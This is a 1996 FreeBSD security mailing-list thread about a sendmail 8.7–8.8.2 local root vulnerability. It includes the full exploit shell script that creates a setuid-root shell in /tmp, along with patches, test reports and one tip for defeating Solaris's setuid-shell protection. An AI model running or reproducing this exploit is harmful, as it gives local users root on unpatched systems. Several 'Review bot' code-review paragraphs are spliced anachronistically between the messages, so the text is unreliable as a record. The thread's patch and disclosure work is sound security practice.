From owner-freebsd-security Sun Nov 17 02:28:18 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA10571 for security-outgoing; Sun, 17 Nov 1996 02:28:18 -0800 (PST) Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA10563; Sun, 17 Nov 1996 02:28:10 -0800 (PST) Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id EAA14226; Sun, 17 Nov 1996 04:26:35 -0500 Date: Sun, 17 Nov 1996 03:26:35 -0600 (CST) 
From: "S(pork)" X-Sender: spork@super-g.inch.com To: cschuber@uumail.gov.bc.ca cc: security-officer@freebsd.org, freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <199611161927.LAA04262@cwsys.cwent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Thanks for the patch; I needed it... Looks like this took care of it... Charles On Sat, 16 Nov 1996, Cy Schubert wrote: > This appears to be a better fix, and it works too. > > > Regards, Phone: (604)389-3827 > Cy Schubert OV/VM: BCSC02(CSCHUBER) > Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET > ITSD Internet: cschuber@uumail.gov.bc.ca > cschuber@bcsc02.gov.bc.ca > > "Quit spooling around, JES do it." > > ------- Forwarded Message > > Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA23212 for cy; Sat, 16 Nov 1996 08:40:16 -0800 (PST) > X-UIDL: 848169128.001 > Resent-From: Cy Schubert - ITSD Open Systems Group > Resent-Message-Id: <199611161640.IAA23212@passer.osg.gov.bc.ca> > Received: from orca.gov.bc.ca (orca.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA22021 for ; Sat, 16 Nov 1996 08:40:15 -0800 (PST) > Received: from pdx1.world.net by orca.gov.bc.ca (5.4R3.10/200.1.1.4) > id AA02926; Sat, 16 Nov 1996 08:40:13 -0800 > Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id IAA02623; Sat, 16 Nov 1996 08:38:55 -0800 (PST) > Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id DAA30954; Sun, 17 Nov 1996 03:35:59 +1100 > Prev-Resent-Date: Sun, 17 Nov 1996 03:35:59 +1100 > Old-X-Envelope-From: cjs@portal.ca Sun Nov 17 03:27:52 1996 > X-Authentication-Warning: didactic.cynic.net: cjs owned process doing -bs > Date: Sat, 16 Nov 1996 00:15:39 -0800 (PST) 
> From: Curt Sampson > X-Sender: cjs@didactic > To: Leshka Zakharoff > Cc: best-of-security@suburbia.net > In-Reply-To: <199611160110.EAA04168@leshka.chuvashia.su> > Message-Id: > Mime-Version: 1.0 > Content-Type: TEXT/PLAIN; charset=US-ASCII > Approved: proff@suburbia.net > Prev-Resent-Message-Id: <"2hTZt3.0.dZ7.krUZo"@suburbia> > Prev-Resent-From: best-of-security@suburbia.net > X-Mailing-List: archive/latest/509 > X-Loop: best-of-security@suburbia.net > Precedence: list > Prev-Resent-Sender: best-of-security-request@suburbia.net > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > Resent-To: cy@uumail.gov.bc.ca > Resent-Date: Sat, 16 Nov 96 08:40:16 -0800 > Resent-XMts: smtp
>
>
> Huh. Yet another gaping hole, can you believe it? This is entirely
> platform-independent, and has not yet been fixed in 8.2.2. Here's
> the patch to fix it. This was done on 8.7.6; the line numbers may
> differ in other versions but the patch is the same.
>
> - ------------------------------------------------------
> - --- main.c.old Mon Sep 16 12:56:01 1996
> +++ main.c Fri Nov 15 23:56:48 1996
> @@ -1693,14 +1693,16 @@ > sighup() > { > #ifdef LOG > if (LogLevel > 3) > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); > #endif > releasesignal(SIGHUP); > + (void) setgid(RealGid); > + (void) setuid(RealUid); > execv(SaveArgv[0], (ARGV_T) SaveArgv); > #ifdef LOG > if (LogLevel > 0) > syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]); > #endif > exit(EX_OSFILE); > }
> - ------------------------------------------------------
>
> Now who the heck do I send this to to get it back into sendmail? There
> are no e-mail addresses listed for bug reports in the READ_ME file, or
> anywhere else for that matter.
>
> cjs
>
> Curt Sampson cjs@portal.ca Info at http://www.portal.ca/
> Internet Portal Services, Inc.
> Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil.
>
> On Sat, 16 Nov 1996, Leshka Zakharoff wrote:
>
> > Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK)
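Review bot: the two calls added to sighup(), `(void) setgid(RealGid);` and `(void) setuid(RealUid);`, discard their return values, so if either failed the handler would still go on to `execv(SaveArgv[0], (ARGV_T) SaveArgv)` with whatever privilege it kept; test both and bail out before the execv, reusing the LOG_ALERT/exit path the hunk already has for a failed exec. The order is right (group first, then user: once the effective uid is no longer 0 a later setgid() can only succeed for the process's own real or saved gid). Note what this does and does not cover: SaveArgv[0] is still the caller-chosen argv[0] (the exploit quoted below starts sendmail as /tmp/smtpd), so the daemon still re-execs an arbitrary path on SIGHUP; this hunk only makes it do so as the invoking user instead of root. Refusing daemon mode to a non-root caller however the mode was selected is the other half of the fix, and it is not in this patch.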
> > From: Leshka Zakharoff > > To: best-of-security@suburbia.net > > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > > Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100 > > Resent-From: best-of-security@suburbia.net
> >
> > #-------------------------------- CUT HERE -------------------------------------
> > #!/bin/sh
> > #
> > #
> > # Hi !
> > # This is exploit for sendmail smtpd bug
> > # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
> > # This shell script does a root shell in /tmp directory.
> > # If you have any problems with it, drop me a letter.
> > # Have fun !
> > #
> > #
> > # ----------------------
> > # ---------------------------------------------
> > # ----------------- Dedicated to my beautiful lady ------------------
> > # ---------------------------------------------
> > # ----------------------
> > #
> > # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
> > #
> > #
> > #
> > # leshka: exec the setuid-root sendmail with argv[0] set to "/tmp/smtpd".
> > # sendmail selects daemon mode from an argv[0] basename of "smtpd" and keeps
> > # argv[0] in SaveArgv, which its SIGHUP handler re-execs without dropping root.
> > echo 'main() '>>leshka.c
> > echo '{ '>>leshka.c
> > echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",(char *)0); '>>leshka.c
> > echo '} '>>leshka.c
> > #
> > #
> > # smtpd: the program the root-privileged daemon execs on SIGHUP; it leaves
> > # a setuid-root copy of sh in /tmp.
> > echo 'main() '>>smtpd.c
> > echo '{ '>>smtpd.c
> > echo ' setuid(0); setgid(0); '>>smtpd.c
> > echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
> > echo '} '>>smtpd.c
> > #
> > #
> > cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
> > ./leshka
> > # pick the pid of the daemon that ps lists as /tmp/smtpd and send it SIGHUP
> > kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
> > rm leshka.c leshka smtpd.c /tmp/smtpd
> > /tmp/sh
> > #-------------------------------- CUT HERE -------------------------------------
> >
> >
> >
>
> ------- End of Forwarded Message
>
From owner-freebsd-security Sun Nov 17 02:53:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA11726 for security-outgoing; Sun, 17 Nov 1996 02:53:47 -0800 (PST) Received: from snc.sgu.ru (root@snc.sgu.ru [194.85.44.19]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA11721 for ;
Sun, 17 Nov 1996 02:53:38 -0800 (PST) Received: from snc.sgu.ru (vadim@localhost [127.0.0.1]) by snc.sgu.ru (8.8.2/8.8.2) with SMTP id NAA03188 for ; Sun, 17 Nov 1996 13:52:48 +0300 (MSK) Message-ID: <328EEE7F.62319AC4@ssu.runnet.ru> Date: Sun, 17 Nov 1996 10:52:47 +0000 From: Vadim Zabelin Organization: V. Zabelin Enterprises X-Mailer: Mozilla 3.01Gold (X11; I; BSD/386 uname failed) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This appears to be a better fix, and it works too. From owner-freebsd-security Sun Nov 17 04:09:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA16038 for security-outgoing; Sun, 17 Nov 1996 04:09:10 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id EAA16018; Sun, 17 Nov 1996 04:09:04 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id NAA12639; Sun, 17 Nov 1996 13:08:58 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id NAA31352; Sun, 17 Nov 1996 13:08:24 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id MAA18803; Sun, 17 Nov 1996 12:58:53 +0100 (MET) Message-ID: Date: Sun, 17 Nov 1996 12:58:53 +0100 
From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org Subject: Re: New sendmail bug... References: X-Mailer: Mutt 0.50.05 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686 In-Reply-To: ; from Marc G. Fournier on Nov 16, 1996 23:57:40 -0500 Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk According to Marc G. Fournier: > Please send details on 'sploit...would like to test on my Solaris > 2.5.1 box as well... The bug is fixed in FreeBSD 2.2, 2.1.6 and 3.0-CURRENT. Here is Allman's fix that has been committed: 
From: Eric Allman Subject: Re: [leshka@leshka.chuvashia.su: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).] Date: Sat, 16 Nov 1996 07:15:08 -0800 Maybe I just haven't had enough coffee yet -- I can't reproduce the problem (on BSD/OS 2.0.1). Perhaps it is because I already have a daemon running -- I just get "problem creating SMTP socket" logged a few times. It wouldn't have worked for me anyhow; I disallow setuid binaries on my /tmp filesystem (always a good idea!). However, I believe that _other_ people can reproduce this, and that's good enough. I'm going to take a couple of precautions (patch enclosed). I would appreciate it if as many as possible of you can give me the "before and after" info on this, just to make sure I've patched it successfully. As I say, since I can't reproduce it, I'm kind of stuck for a verification. Many thanks for forwarding this. eric ------- main.c ------- *** - Wed Dec 31 16:00:00 1969 --- main.c Sat Nov 16 07:07:17 1996 *************** *** 493,507 **** { case MD_DAEMON: case MD_FGDAEMON: ! # ifdef DAEMON ! if (RealUid != 0) ! { ! usrerr("Permission denied"); ! exit(EX_USAGE); ! } ! vendor_daemon_setup(CurEnv); ! /* fall through ... */ ! # else usrerr("Daemon mode not implemented"); ExitStat = EX_USAGE; break; --- 493,499 ---- { case MD_DAEMON: case MD_FGDAEMON: ! # ifndef DAEMON usrerr("Daemon mode not implemented"); ExitStat = EX_USAGE; break; *************** *** 899,904 **** --- 891,904 ---- /* fall through ... 
*/ case MD_DAEMON: + /* check for permissions */ + if (RealUid != 0) + { + usrerr("Permission denied"); + exit(EX_USAGE); + } + vendor_daemon_setup(CurEnv); + /* remove things that don't make sense in daemon mode */ FullName = NULL; GrabTo = FALSE; *************** *** 1932,1937 **** --- 1932,1946 ---- syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); #endif releasesignal(SIGHUP); + if (setuid(RealUid) < 0 || setgid(RealGid) < 0) + { + #ifdef LOG + if (LogLevel > 0) + syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m", + RealUid, RealGid); + #endif + exit(EX_OSERR); + } execv(SaveArgv[0], (ARGV_T) SaveArgv); #ifdef LOG if (LogLevel > 0) -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996 From owner-freebsd-security Sun Nov 17 07:51:42 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA06960 for security-outgoing; Sun, 17 Nov 1996 07:51:42 -0800 (PST) Received: from ns1.zns.net (ns1.zygaena.com [206.148.80.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA06955 for ; Sun, 17 Nov 1996 07:51:22 -0800 (PST) Received: (from nobody@localhost) by ns1.zns.net (8.7.5/8.7.3) id KAA20979 for ; Sun, 17 Nov 1996 10:51:19 -0500 (EST) Received: from selway.i.com(198.30.169.1) by ns1.zns.net via smap (V1.3) id sma020977; Sun Nov 17 10:51:08 1996 Received: (from ewb@localhost) by selway.i.com (8.7.3/8.7.3) id KAA09581 for freebsd-security@freebsd.org; Sun, 17 Nov 1996 10:51:03 -0500 (EST) Date: Sun, 17 Nov 1996 10:51:03 -0500 (EST) 
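Review bot: in the hunk at lines 493-507 the `RealUid != 0` check is removed from the MD_DAEMON/MD_FGDAEMON option case and the `# ifdef DAEMON` body collapses to the `# ifndef DAEMON` "not implemented" error, so read on its own this hunk loosens a check; it is only correct together with the hunk at line 899 that re-adds the check once the operating mode is finally known. A one-line comment at this site saying the permission check moved to the mode switch would keep a later reader from restoring it here, and the commit message should say the check moved rather than that it was dropped.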
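Review bot: the `if (RealUid != 0)` block inserted under `case MD_DAEMON:` in the hunk at line 899 is the part that actually closes the hole: the old check fired only on an explicit `-bd`, while sendmail can also end up in MD_DAEMON from its argv[0], which is how the exploit reaches daemon mode by exec'ing sendmail as /tmp/smtpd with no option at all; placing the check after mode selection covers both paths, and calling vendor_daemon_setup(CurEnv) only after it passes is the right order. One point: `usrerr("Permission denied")` followed by `exit(EX_USAGE)` refuses the attempt without logging who made it; a syslog line carrying RealUid would make the attempt visible (the "uid 1374 tried to start daemon mode" message Will Brown reports later in this thread is not in the hunk as quoted here, so either his copy of the patch differs or the log call lives elsewhere).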
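Review bot: in the sighup() hunk at line 1932 the condition reads `setuid(RealUid) < 0 || setgid(RealGid) < 0`, so the uid is dropped before the gid. Once setuid() has left uid 0, the following setgid() only succeeds because RealGid happens to be the process's own real gid; the usual order is setgid() first, then setuid(), so that a setgid() failure is caught while still privileged and the code does not silently depend on RealGid being the real gid. Otherwise this is the right shape: either failure logs at LOG_ALERT and exits with EX_OSERR instead of falling through to `execv(SaveArgv[0], (ARGV_T) SaveArgv)` as root. Minor: RealUid and RealGid are passed to `%d`; cast them to int so the format matches on platforms where uid_t and gid_t are not int-sized.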
From: Will Brown Message-Id: <199611171551.KAA09581@selway.i.com> To: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk FYI: The exploit fails on Solaris 2.5. Works on FreeBSD 2.1.5. On Solaris, /tmp/sh is created (r-sr-sr--) but executing it does not give root privilege. Assume this is due to restrictions in Solaris on executing setuid root programs outside of certain directories? Perhaps that defense can be easily overcome, or is it a good last line of defense? Why not a similar defense in FreeBSD? My apologies if this has been hashed over already. Obviously not good in any case. -- Will Brown From owner-freebsd-security Sun Nov 17 08:09:12 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA08100 for security-outgoing; Sun, 17 Nov 1996 08:09:12 -0800 (PST) Received: from procert.cert.dfn.de (procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id IAA08063 for ; Sun, 17 Nov 1996 08:08:45 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.3/8.8.3) with ESMTP id RAA21005; Sun, 17 Nov 1996 17:09:29 +0100 (MET) 
From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.3/8.8.3) id RAA13620; Sun, 17 Nov 1996 17:09:27 +0100 (MET) Message-Id: <199611171609.RAA13620@tiger.cert.dfn.de> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: ewb@zns.net (Will Brown) Date: Sun, 17 Nov 1996 17:09:27 +0100 (MET) Cc: freebsd-security@freebsd.org In-Reply-To: <199611171551.KAA09581@selway.i.com> from "Will Brown" at Nov 17, 96 10:51:03 am Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

Will Brown wrote:
>
> FYI: The exploit fails on Solaris 2.5. Works on FreeBSD 2.1.5. On
> Solaris, /tmp/sh is created (r-sr-sr--) but executing it does not give
> root privilege. Assume this is due to restrictions in Solaris on
> executing setuid root programs outside of certain directories? Perhaps
> that defense can be easily overcome, or is it a good last line of
> defense? Why not a similar defense in FreeBSD?
>
> My apologies if this has been hashed over already.
>
> Obviously not good in any case.

The exploit does work on Solaris (as you see the shell with the setuid
root is created). It doesn't matter if starting that shell will give you
a root shell or not because you already managed to execute a program
with root privs.

The setuid /tmp/sh fails because either /tmp is mounted nosuid (it's
always a good idea to mount all user-writable dirs like /tmp, /var etc.
nosuid) or you just have to use the "-p" switch to avoid resetting the
userid while starting a setuid shell (see "man sh").

Bye,
Wolfgang.

- --
Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str.
30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMo84nAQmfXmOCknRAQGA3wP+OtitdGU/tPRYqyRaWwzUun2esGmZC5tU WMqBrOzjmlLntcQ0kRm/MSlTHIIHSfu4piA3PMoNHwyPKESTaIUQoYj/Wpy5xqSr v4SWLd0ZImgjp2eNH/yxyz1EH+iD/dBylZm+qeFUUteFANwuxp7EbZKWiOjFM8p0 GQcwVwSzg5E= =fyTX -----END PGP SIGNATURE----- From owner-freebsd-security Sun Nov 17 08:22:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA09586 for security-outgoing; Sun, 17 Nov 1996 08:22:28 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA09562 for ; Sun, 17 Nov 1996 08:22:07 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id LAA02721; Sun, 17 Nov 1996 11:18:39 -0500 
From: Adam Shostack Message-Id: <199611171618.LAA02721@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <199611171551.KAA09581@selway.i.com> from Will Brown at "Nov 17, 96 10:51:03 am" To: ewb@zns.net (Will Brown) Date: Sun, 17 Nov 1996 11:18:39 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Will Brown wrote:
| FYI: The exploit fails on Solaris 2.5. Works on FreeBSD 2.1.5. On
| Solaris, /tmp/sh is created (r-sr-sr--) but executing it does not give
| root privilege. Assume this is due to restrictions in Solaris on
| executing setuid root programs outside of certain directories? Perhaps
| that defense can be easily overcome, or is it a good last line of
| defense? Why not a similar defense in FreeBSD?

I think there's code in the shipped Solaris shells that causes them to
switch uid back to that of the invoker when they are setuid. This is a
slick defense against exploit scripts, but it doesn't take that much to
work around it. My preferred method is to use a tcsh binary that doesn't
have the defence instead of /bin/sh.

On another note, how about qmail replacing sendmail?

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From owner-freebsd-security Sun Nov 17 08:28:01 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA10057 for security-outgoing; Sun, 17 Nov 1996 08:28:01 -0800 (PST) Received: from ingenieria ([168.176.15.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA10036; Sun, 17 Nov 1996 08:27:39 -0800 (PST) Received: from unalmodem.usc.unal.edu.co by ingenieria (SMI-8.6/SMI-SVR4) id LAA21042; Sun, 17 Nov 1996 11:27:34 +0600 Message-ID: <328F623D.10A4@ingenieria.ingsala.unal.edu.co> Date: Sun, 17 Nov 1996 11:06:37 -0800
From: "Pedro Giffuni S." Reply-To: pgiffuni@fps.biblos.unal.edu.co Organization: Universidad Nacional de Colombia X-Mailer: Mozilla 3.0 (Win16; I) MIME-Version: 1.0 To: "S(pork)" CC: freebsd-security@freebsd.org, release@freebsd.org Subject: Re: New sendmail bug... References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

S(pork) wrote:
>
> It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with
> more knowledge on this issue can check it out, please post to the list so
> everyone can free themselves of this vulnerability. Root in under 15
> seconds with an account on the machine. If you need the 'sploit, please
> mail me here and I'll send it to you. I verified it on FBSD, NetBSD,
> Linux so far...
>
> TIA
>
> Charles

After reading the latest CERT (which is rather old!), I installed smrsh
on all my boxes and changed the uid to an anonymous mail user with no
shell, as suggested. Does this cover it? Do the new releases install
smrsh by default?

My mail under 8.8.0 is being read and manipulated by someone outside,
but this probably doesn't have a solution does it?

Pedro.

From owner-freebsd-security Sun Nov 17 08:30:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA10323 for security-outgoing; Sun, 17 Nov 1996 08:30:50 -0800 (PST) Received: from chaos.ecpnet.com (raistlin@chaos.ecpnet.com [204.246.64.13]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id IAA10306 for ; Sun, 17 Nov 1996 08:30:34 -0800 (PST) Received: from localhost (raistlin@localhost) by chaos.ecpnet.com (8.8.2/8.7.3) with SMTP id KAA02328; Sun, 17 Nov 1996 10:31:56 -0600 Date: Sun, 17 Nov 1996 10:31:55 -0600 (CST)
From: Justen Stepka To: Will Brown cc: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <199611171551.KAA09581@selway.i.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

On Sun, 17 Nov 1996, Will Brown wrote:

> FYI: The exploit fails on Solaris 2.5. Works on FreeBSD 2.1.5. On
> Solaris, /tmp/sh is created (r-sr-sr--) but executing it does not give
> root privilege. Assume this is due to restrictions in Solaris on
> executing setuid root programs outside of certain directories? Perhaps
> that defense can be easily overcome, or is it a good last line of
> defense? Why not a similar defense in FreeBSD?
>
> My apologies if this has been hashed over already.
>
> Obviously not good in any case.
>
> --
> Will Brown
>

Thing is that the new FreeBSD is patched for this and it won't work. I'm
sure that 2.2-SNAP has the fix but I haven't tested it. I know that
3.0-Current is patched and that's what's important for me :)

------------------------------------------------------------------------------
Justen Stepka | http://www.ecpnet.com/~raistlin
Network Administrator | "This space for rent"
raistlin@ecpnet.com | 3.0-CURRENT FreeBSD 3.0-CURRENT
------------------------------------------------------------------------------

From owner-freebsd-security Sun Nov 17 09:02:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA13443 for security-outgoing; Sun, 17 Nov 1996 09:02:58 -0800 (PST) Received: from procert.cert.dfn.de (root@procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA13179; Sun, 17 Nov 1996 09:00:27 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.3/8.8.3) with ESMTP id SAA21285; Sun, 17 Nov 1996 18:00:57 +0100 (MET)
From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.3/8.8.3) id SAA13765; Sun, 17 Nov 1996 18:00:55 +0100 (MET) Message-Id: <199611171700.SAA13765@tiger.cert.dfn.de> Subject: Re: New sendmail bug... To: pgiffuni@fps.biblos.unal.edu.co Date: Sun, 17 Nov 1996 18:00:54 +0100 (MET) Cc: spork@super-g.com, freebsd-security@freebsd.org, release@freebsd.org In-Reply-To: <328F623D.10A4@ingenieria.ingsala.unal.edu.co> from "Pedro Giffuni S." at Nov 17, 96 11:06:37 am Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- Pedro Giffuni S. wrote: > > S(pork) wrote: > > > > It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with > > more knowledge on this issue can check it out, please post to the list so > > everyone can free themselves of this vulnerability. Root in under 15 > > seconds with an account on the machine. If you need the 'sploit, please > > mail me here and I'll send it to you. I verified it on FBSD, NetBSD, > > Linux so far... > > > > TIA > > > > Charles > After reading the latest CERT (which is rather old!), I installed smrsh > on all my boxes and changed the uid to an anonymous mail user with no > shell, as suggested. Does this cover it? Do the new releases install > smrsh by default? The latest CERT Advisory on sendmail is from September, 18th (last revised September, 21st) CA-96:20 and discusses a problem in sendmail 8.7.x. ftp://ftp.cert.dfn.de/pub/csir/cert/cert_advisories/CA-96.20.sendmail_vul The last sendmail Advisory is the Auscert Advisory AA-96:06a regarding a security problem in sendmail 8.8.0 and 8.8.1 and is dated October 18th (last revised October 20th). Not that old, is it? ftp://ftp.cert.dfn.de/pub/csir/auscert/auscert-advisory/ AA-96.06a.sendmail.8.8.0-8.8.1.Vulnerability The current problem applies at least to sendmail 8.7 - 8.8.2 (incl.). 
A 8.8.3 version is currently being tested and will fix the problem. Using "smrsh" is a good idea, but won't fix the current problem. > My mail under 8.8.0 is being read and manipulated by someone outside, > but this probably doesnīt have a solution does it? 8.8.0 has security problems which are even exploitable from the remote. The current 8.8.2 problem can be exploited by local users only. Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMo9EwwQmfXmOCknRAQE/bwP/XUviRLsDPECYkxA/W5csUyqTbOKIQp1u YnSdAH/jsEQzPpwZsL9AeQ5p6v5rRmoKHLhC/D0uN+eDZkyyIJSlukb1pvfIzL5b qGAPx71sFZxo+p7d088nJ6oJgr0DP+MibYXvY4YBdbJTrtF/25Qin51EcsfG7TaF iGDCX5dyVTw= =1g2X -----END PGP SIGNATURE----- From owner-freebsd-security Sun Nov 17 10:21:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA21346 for security-outgoing; Sun, 17 Nov 1996 10:21:29 -0800 (PST) Received: from ns1.zns.net (ns1.zygaena.com [206.148.80.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA21322 for ; Sun, 17 Nov 1996 10:21:18 -0800 (PST) Received: (from nobody@localhost) by ns1.zns.net (8.7.5/8.7.3) id NAA21285 for ; Sun, 17 Nov 1996 13:21:22 -0500 (EST) Received: from selway.i.com(198.30.169.1) by ns1.zns.net via smap (V1.3) id sma021283; Sun Nov 17 13:21:07 1996 Received: (from ewb@localhost) by selway.i.com (8.7.3/8.7.3) id NAA09840 for freebsd-security@FreeBSD.org; Sun, 17 Nov 1996 13:20:58 -0500 (EST) Date: Sun, 17 Nov 1996 13:20:58 -0500 (EST) 
From: Will Brown Message-Id: <199611171820.NAA09840@selway.i.com> To: freebsd-security@FreeBSD.org Subject: Re: new sendmail exploit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

Definitely exploitable on Solaris 2.5 (and presumably lower). As Wolfgang
and others pointed out. Just used bash instead of /bin/sh. No need to use
/tmp either. Heck you could put it in /usr/bin!

Patch to 8.8.2 from Eric Allman seems to work (on Solaris 2.4). "leshka"
prints "501 Permission denied" and "smtpd" is not spawned. Log message:
sendmail[17653]: uid 1374 tried to start daemon mode

Sorry for the O/S version discrepancies here. 2.4 machine was most
critical so I patched it first.

--
Will Brown

